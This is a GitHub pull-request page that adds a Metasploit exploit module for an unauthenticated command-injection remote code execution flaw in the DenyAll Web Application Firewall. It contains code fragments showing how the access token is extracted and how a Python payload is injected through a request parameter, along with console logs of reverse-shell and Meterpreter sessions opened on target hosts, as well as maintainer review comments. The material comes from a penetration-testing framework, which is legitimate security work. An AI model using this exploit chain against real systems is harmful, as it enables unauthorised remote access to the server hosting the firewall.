Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding DenyAll Web Application Firewall RCE module #8980

Merged
merged 3 commits into from Sep 22, 2017

Conversation

mdisec
Copy link
Contributor

@mdisec mdisec commented Sep 19, 2017

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/denyall_waf_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing The target appears to be vulnerable.
  • Run exploit
  • Verify that you are seeing iToken value extraction.
  • Verify that you are getting meterpreter session.
msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >

Here is the advisory and technical details about that vulnerability.
https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/

}
})

if res && res.code == 200 && res.body.include?("iToken")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This iToken extraction code should be moved to a separate method since the exact same code is also required for exploiting. We can save on a few lines of code.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It's done and retested. Thank you very much for review.

@h00die
Copy link
Contributor

h00die commented Sep 21, 2017

if i get some time over the weekend (which is likely) I've got my eye on this.

@@ -0,0 +1,37 @@
## Vulnerable Application

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Unauthenticated users


This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

**Vulnerable Application Installation Steps**
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

For consistency I think you can remove this bold area and just let it all blend in to one.


You just need to follow instruction above URL.

## Verification Steps
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.


## Verification Steps

A successful check of the exploit will look like this:
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Add the heading of ##Scenarios

super(update_info(info,
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

users


def exploit
# Get iToken from unauthenticated accessible endpoint
print_status("Extracting iToken value")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

change " to '

'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => "LOCALUID",
'typeOf' => "debug"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

change " to '

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => "LOCALUID",
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

change " to '

'iToken' => token,
'tag' => "tunnel",
'stime' => r,
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

if the server is php based, was there a particular reason why the default payload is python? There is a php meterpreter, but didn't know if the php pushes to python or something like that where python would be the better option

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for all the review @h00die. Nodejs, python and different type of technologies also being used by this product. Also, as far as I know python meterpreter has much more capabilities than the php, such as stdapi.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

i'll give this a run over the weekend, i'll also try out the php payload, would be a good thing to note that it also works (for curious minds like myself who have encountered issues in the past)

```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

These look to be public IPs (unverified), you may want to change them to something else like 1.1.1.1 and 2.2.2.2

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It was my AWS London instance IP that I've used for testing purpose. It's not alive anymore.

@h00die
Copy link
Contributor

h00die commented Sep 22, 2017

Worked fine for me! I actually deployed 6.2.0.

msf > use exploit/linux/http/denyall_waf_exec 
msf exploit(denyall_waf_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(denyall_waf_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(denyall_waf_exec) > set reverselistenerbindaddress 3.3.3.3
reverselistenerbindaddress => 3.3.3.3
msf exploit(denyall_waf_exec) > set verbose true
verbose => true
msf exploit(denyall_waf_exec) > check
[*] 1.1.1.1:3001 The target appears to be vulnerable.
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:13926) at 2017-09-21 21:22:02 -0400
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:13784) at 2017-09-21 21:22:09 -0400

meterpreter > sysinfo
Computer        : ip-172-31-34-108
OS              : Linux 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.34.108 - Meterpreter session 2 closed.  Reason: User exit

Switched to a generic shell as well.

msf exploit(denyall_waf_exec) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Command shell session 3 opened (2.2.2.2:4444 -> 1.1.1.1:14236) at 2017-09-21 21:23:04 -0400
whoami
id

daactrl
uid=998(daactrl) gid=999(denyall) groups=999(denyall)
exit

@h00die
Copy link
Contributor

h00die commented Sep 22, 2017

A few minor edits on the docs still left to do and i'll get this landed!

@h00die
Copy link
Contributor

h00die commented Sep 22, 2017

i take it back, landing now.

@h00die h00die merged commit 3d543b7 into rapid7:master Sep 22, 2017
h00die added a commit that referenced this pull request Sep 22, 2017
@h00die
Copy link
Contributor

h00die commented Sep 22, 2017

Release Notes

The DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0.

@h00die
Copy link
Contributor

h00die commented Sep 22, 2017

Thanks for the contribution, looked pretty good from the start, and thanks for being so responsive!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants